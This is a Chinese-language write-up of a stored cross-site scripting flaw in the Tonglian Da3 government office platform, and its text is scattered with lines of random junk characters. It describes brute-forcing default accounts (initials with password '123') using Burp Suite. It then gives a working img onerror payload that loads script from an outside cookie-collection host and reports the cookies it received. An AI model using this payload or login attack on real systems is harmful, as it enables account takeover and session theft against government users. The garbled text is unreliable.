/ m J: [4 _- g8 m5 W
x! R W& q* U6 h' U: Z 同联Da3协同办公平台后台通用储存型xss漏洞
8 L# V" Z9 q' D5 Q
6 s5 E- M- A; j6 ?
( `+ o9 H3 K( O" |" Z1 G* m* J; g
平台简介:
. V) E" I) Q5 l0 G7 ~8 T
7 Z% e3 y! p, A( s' }
7 O7 ]! R1 }9 m+ V1 e( Q 2 _/ e% R& u3 W: D8 T2 W
3 Q" \) `, W$ Y. U & o- n, A4 i4 y9 ~" x6 S
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 {! S; O/ v) }$ |# L同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
W$ ^1 g7 f N; D& t5 y( |同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 V% ?6 J C) A# }
9 x# P2 ~" W2 d( H
5 m& {9 R& b, ]+ }! h- K
2 g- j1 Q& O; W4 P: Y
+ ?. _& s7 F1 @+ @ p! Y
# |/ U; R, \. ^7 y) d 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
' M' w* H, r/ A7 q( ]$ C
& y0 R( f% R6 Z( z* u8 _/ W
2 x4 x I' L7 T: z# w5 B3 ?
) L7 y+ z1 Q. _. c. \3 |+ w
; o/ ~1 N# S' N6 E' [' r) \, ~
7 |6 E, S4 T/ r$ _4 D/ d http://1.1.1.1:7197/cap-aco/#(案例2-)
+ ^4 d/ m4 q2 E7 I" M0 p# ?
. r9 l7 ?5 F! J j. Y! u* w $ @/ a. W# ?! c* n" _! E4 Z
http://www.XXOO.com (案例1-官网网站)4 ^* f' e# d5 g8 z! T$ F( r0 Z3 V
+ ]: l& w2 t5 u$ p. [$ b! }7 F
: F9 D+ P: I5 [: b6 f- I 漏洞详情:7 B0 G& F5 `9 W0 ^; A
. P& J$ F) i7 ^+ q5 R
5 y4 U' K: [, | W/ q, b" |
案例一、
4 v8 R: E# S$ c% _2 X1 _
8 J' i' h% i7 {) V 9 Q! B4 P% n2 I4 k. ^
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
8 y; ^3 D m8 P$ m
& | }% I' Z+ u& R; W
. `- R: ^4 S# G4 t7 ` 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
0 Q! r$ @( J& z8 m% s: K2 _
# H% P/ P, E+ }! `$ J) g
- @! F! I) b b: L, f. s9 u7 @
# J& A# e" j+ h; a' \ D
. L5 e/ }4 E M1 O
# Y6 |5 E3 a; K, a
' E t e9 j6 W. e, p, h% t+ @3 o% l1 f
1 N6 L9 m2 _* ?( S9 i
9 A9 k& R" M3 _- R$ [ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 W3 B5 l3 n0 o: P' y0 o6 ~4 G* b8 c
1 q- Q7 b0 {9 y t# `5 h3 N 2 @7 q: v# S$ x& j3 ~$ K4 h
1 B C Q( H" c+ k
; p5 K* R. P) `0 B2 @
* W) s" V2 q) D$ v& E
$ l& E: M$ m) q! J% _! |
4 z5 _* q( j0 u+ n3 J% t4 y( p3 v % [ X" X! S! M7 f; u) Y6 Z
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ' F8 F3 ~* _4 c4 l) _3 O1 b
" _ n9 y5 \; Z+ W& o- d 8 a" E9 t4 \ q, ^. ?# i8 p
. s9 l$ P6 ?( ~! L6 @' X- Q
D- M- G) o/ C) |
* U) z# A: b6 y4 x6 z1 ^& _. _% R <img src=x2 S$ L, u! ~. \7 T/ y" G' q$ D& A. P
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ) K2 J9 @5 R. J5 _ f
7 U4 h( A. |8 x
: {0 r2 v* ~5 C! Q
/ O0 @. u% `/ f* k
, k* I2 W4 H# o! z% C0 o+ j. k t ; I/ _2 W$ @7 K. W+ Q
然后发送,接收cookie如图:
9 ^: }5 I$ Z: ]
: ~) X: S' }2 ?/ @+ C* K
9 p# D+ I! _$ M; P+ e b' }4 n6 K
7 t# H+ w4 p- d' N3 V
# }" n* L4 H; T% A % V/ ~7 `8 c) x" @8 T
[- b/ S1 K7 b2 N4 z* s' a
0 f8 w/ ^1 Y# [, x
9 W) c5 Q$ Y4 O Y; x; B* u
4 ]- `& z; M/ M5 s3 c' U
: s, f1 ?% ~7 ^ 2 X8 B! g8 L q
0 k* E; @1 V: D% V& m7 u
/ T) e, Y) V+ h' z( R
+ g+ r! m0 b% d& o/ M1 t, b; T; N, Q& i
) ~& h" F$ J5 u0 c
3 H# q- f, V# K0 w $ g E: U6 L5 H1 E: L
- P2 B2 ~0 t2 @9 o$ N
. a3 P' Q0 B6 m! H6 o- v" {$ i " J) x( M0 a: s8 t
m% T: M( P3 ? I9 y& g. e7 P
7 L) X p9 G+ C ( o6 r _5 ]1 p# S
案例2、 ) N) S9 D6 K+ Z; v+ o9 ~
; d8 [- p- |4 G! S$ W
|" v! D: R* u7 c2 {
前面步骤都一样,下面看效果图: ( E& {4 R$ {) e7 c `8 z% m
# G* N1 u8 M1 G6 R: \3 v
; w. Y8 [. @4 d J" N
# R$ v8 ~" l- g: a: h
% e8 ?/ ]+ o/ k
- _- z: S d( _1 @
. s, C& D1 g: n0 s3 |( T
4 X: F6 @$ y3 B$ k " t9 A# g3 X X: `" T
! v! [/ a H# _' X
! f1 g; u2 R5 K3 B* w
% N! R7 R. M) Q( o6 I
* E' Z$ O: J9 Z) w0 A, C
4 n9 s- Q2 E' `/ }) |/ i
" ]- q N. [1 j# t" g
' z6 Z% K; |# O) R3 m5 x
/ l+ V2 ]/ ?2 v$ u
% T, P. ?: y- Z8 c$ C+ R* H3 I $ _* }: o- U' P# b
8 p1 g5 e. {3 P% m2 s. {" P9 ]7 r
$ f% r. K2 h1 n' B! N4 W9 t
- j, }: \- p( }: _
. _6 C& I: n# |. O5 G z
# J9 r0 B( ~: V0 f
4 c b7 G8 ^8 D" P. v! b1 p1 l L
/ m: ~$ z! z6 q% z: s
) l+ l" H0 n0 z0 d% e5 g4 ~ : }) \( M' K0 I/ C, v' }1 }
1 ^( C3 b( }: T0 ^